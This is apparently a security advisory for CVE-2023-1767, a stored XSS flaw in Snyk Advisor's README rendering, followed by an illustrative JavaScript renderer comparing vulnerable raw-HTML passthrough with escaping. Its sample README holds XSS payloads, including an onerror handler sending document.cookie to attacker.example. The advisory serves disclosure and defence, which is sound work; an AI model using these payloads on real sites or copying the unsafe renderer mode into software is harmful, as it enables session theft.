First published: Thu Apr 20 2023
The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to stored XSS prior to 28 March 2023. Snyk Advisor displays the contents of a scanned package's README on the package's health page. An attacker could publish a package to npm whose markdown README contained raw HTML that the page rendered without escaping or sanitising. Once Snyk Advisor imported the package, the injected script executed in the browser of every end user who visited that package's page on Snyk Advisor.
Credit: report@snyk.io
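The following is an added example and not Snyk's code: a deliberately small markdown renderer with two modes. With `allowRawHtml: true` it behaves like a markdown library configured to pass HTML through, which is the class of bug described above; with `allowRawHtml: false` every non-markdown character is HTML-escaped and link targets are restricted to http(s). The README, the renderer (only `#` headings, paragraphs and `[text](url)` links are supported) and the `containsActiveContent` check are all constructed for this illustration.

```javascript
// Added example, not code from Snyk Advisor. Shows raw-HTML passthrough
// (the vulnerable behaviour) beside an escaping renderer.

// Constructed sample: a README an attacker could publish to npm.
const MALICIOUS_README = [
  "# totally-legit-package",
  "",
  "Installs fast. <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  "",
  "<script>alert(document.domain)</script>",
  "",
  "Links: [homepage](https://example.com) and [evil](javascript:alert%281%29)",
].join("\n");

// Escape the characters that change meaning in HTML text and attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only http(s) targets; javascript:, data:, vbscript: etc. are dropped.
function safeHref(url) {
  const u = url.trim();
  return /^https?:\/\//i.test(u) ? u : null;
}

// Render [label](url) links inside a block of text.
// Unsafe mode emits surrounding text verbatim and accepts any URL scheme.
function renderInline(text, allowRawHtml) {
  const emit = allowRawHtml ? (s) => s : escapeHtml;
  const re = /\[([^\]]*)\]\(([^)\s]*)\)/g;
  const parts = [];
  let last = 0;
  let m;
  while ((m = re.exec(text)) !== null) {
    parts.push(emit(text.slice(last, m.index)));
    const [, label, url] = m;
    const href = allowRawHtml ? url : safeHref(url);
    parts.push(href !== null
      ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${emit(label)}</a>`
      : emit(label));
    last = m.index + m[0].length;
  }
  parts.push(emit(text.slice(last)));
  return parts.join("");
}

// Block-level rendering: '#' headings and blank-line separated paragraphs.
function renderMarkdown(md, { allowRawHtml }) {
  return md.split(/\n\s*\n/).map((block) => {
    const b = block.trim();
    if (b === "") return "";
    const h = /^(#{1,6})\s+(.*)$/.exec(b);
    if (h) {
      const level = h[1].length;
      return `<h${level}>${renderInline(h[2], allowRawHtml)}</h${level}>`;
    }
    return `<p>${renderInline(b, allowRawHtml)}</p>`;
  }).filter(Boolean).join("\n");
}

// Crude detector (illustrative only): a <script> tag, an on* handler inside
// a tag, or a javascript: href in the rendered output.
function containsActiveContent(html) {
  return /<script\b|<[^>]*\bon\w+\s*=|href="javascript:/i.test(html);
}

const unsafeHtml = renderMarkdown(MALICIOUS_README, { allowRawHtml: true });
const safeHtml = renderMarkdown(MALICIOUS_README, { allowRawHtml: false });
console.log("unsafe:\n" + unsafeHtml + "\n\nsafe:\n" + safeHtml);
```

In the unsafe output the `onerror` handler, the `<script>` element and the `javascript:` link all survive into the page; in the safe output they are inert text and the dangerous link loses its href. A production service would not hand-roll this: disable raw HTML in the markdown library, run the result through a maintained sanitiser such as DOMPurify, and add a Content-Security-Policy that forbids inline script as defence in depth.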
Affected Software | Affected Version | How to fix
---|---|---
Snyk Advisor | Hosted site before 2023-03-28 | Fixed server-side by Snyk on 2023-03-28; no user update to apply
CVE-2023-1767 is a stored XSS vulnerability in the Snyk Advisor website.
Because the injected script ran in the origin of the Snyk Advisor site, an attacker could act in the browser of any visitor to the poisoned package page, potentially leading to data theft or takeover of user accounts.
The attacker needed only to publish an npm package whose markdown README contained the malicious HTML; no interaction with Snyk beyond the package being imported was required.
CVE-2023-1767 has a CVSS base score of 5.4, which is medium severity.
Snyk Advisor is a hosted service, so there is no client-side update for end users to apply; the fix was deployed by Snyk on 2023-03-28. Operators of similar services that render third-party READMEs should treat them as untrusted input and escape or sanitise the resulting HTML.